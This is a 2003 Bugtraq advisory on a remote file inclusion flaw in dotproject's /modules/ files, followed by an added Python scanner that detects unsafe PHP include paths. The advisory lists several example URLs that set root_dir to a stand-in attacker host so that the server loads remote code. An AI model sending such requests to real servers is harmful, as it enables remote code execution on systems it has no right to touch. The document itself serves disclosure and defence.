A non-official patch has been created for this hole and is published on
http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=us (English
version).
>From: mindwarper (at) hush (dot) com
>To: bugtraq (at) securityfocus (dot) com
>Subject: dotproject Remote Code Execution Vulnerability
>Date: Wed, 29 Jan 2003 04:02:24 -0800
>
>dotproject Remote Code Execution Vulnerability (By Mindwarper)
>
><------- ------->
>
>----------------------
>Vendor Information:
>----------------------
>
>Homepage : http://www.dotproject.net
>Vendor : informed
>Mailed advisory: 28/01/03
>Vendor Response : None
>
>
>----------------------
>Affected Versions:
>----------------------
>
>dev20030121
>
>
>----------------------
>Vulnerability:
>----------------------
>
>
>dotproject is a PHP+MySQL beta level web based project management and tracking tool
>that dotmarketing started in Dec. 2000.
>Inside the directory /modules/ multiple files try to include classdefs/date.php
>without defining $root_dir first and allow remote attackers to inject their own
>servers if globals are set on.
>
>Example Code from modules/projects/addedit.php:
>
>******
>
><?php
>##
>## Files modules: index page re-usable sub-table
>##
>
>require_once( "$root_dir/classdefs/date.php" );
>$df = $AppUI->getPref('SHDATEFORMAT');
>$tf = $AppUI->getPref('TIMEFORMAT');
>
>******
>
>As you can see nothing happens before the require_once function is called and therefore
>with globals set on an attacker may include remote files.
>
>Example:
>
>http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker
>
>this works also on
>
>http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker
>http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker
>http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
>http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
>http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker
>
>
>----------------------
>Solution:
>----------------------
>
>Please check the vendor's website for new patches.
>
>As a temporary solution, create a .htaccess file that contains 'Deny from all'.
>Place it in the /modules/ directory and that should block remote users from accessing it.
>
>
>----------------------
>Contact:
>----------------------
>
>Name: Mindwarper
>Email: mindwarper (at) hush (dot) com
>Website: http://mindlock.bestweb.net
>
>
><------- ------->
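An added example, not part of the original posts or of dotproject's code: a heuristic Python audit that flags PHP files whose include/require path uses a variable with no assignment earlier in the same file, which is the pattern the advisory describes for `$root_dir`. The function name, the regexes and the `PATCHED` sample are constructed for illustration.

```python
import re

# include/require statement, captured up to its terminating semicolon
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\b([^;]*);", re.I)
VAR_RE = re.compile(r"\$([A-Za-z_]\w*)")
ASSIGN_RE = re.compile(r"\$([A-Za-z_]\w*)\s*=(?!=)")
SINGLE_QUOTED = re.compile(r"'[^']*'")  # PHP does not interpolate these

def unsafe_includes(php_source):
    """Return (line_no, variable) for every include/require whose path uses a
    variable that has no assignment earlier in the same file. Heuristic:
    line-based, so multi-line statements are not seen."""
    findings, assigned = [], set()
    for line_no, line in enumerate(php_source.splitlines(), 1):
        code = line.strip()
        if code.startswith(("#", "//")):       # skip whole-line comments
            continue
        match = INCLUDE_RE.search(code)
        if match:
            expr = SINGLE_QUOTED.sub("", match.group(1))
            findings += [(line_no, v) for v in VAR_RE.findall(expr)
                         if v not in assigned]
        assigned.update(ASSIGN_RE.findall(code))
    return findings

# Snippet quoted in the advisory (modules/projects/addedit.php).
VULNERABLE = '''<?php
##
## Files modules: index page re-usable sub-table
##

require_once( "$root_dir/classdefs/date.php" );
$df = $AppUI->getPref('SHDATEFORMAT');
'''

# Constructed variant (an assumption, not the vendor's or phpsecure.org's patch):
# the path is derived from the file's own location, never from request input.
PATCHED = '''<?php
$root_dir = dirname(dirname(dirname(__FILE__)));
require_once( "$root_dir/classdefs/date.php" );
'''

if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE), ("patched", PATCHED)):
        print(name, unsafe_includes(src))
```

A variable that is only defined by the script that normally includes the file is still reported, which is intended here: each file under /modules/ can also be requested directly, where that definition never runs.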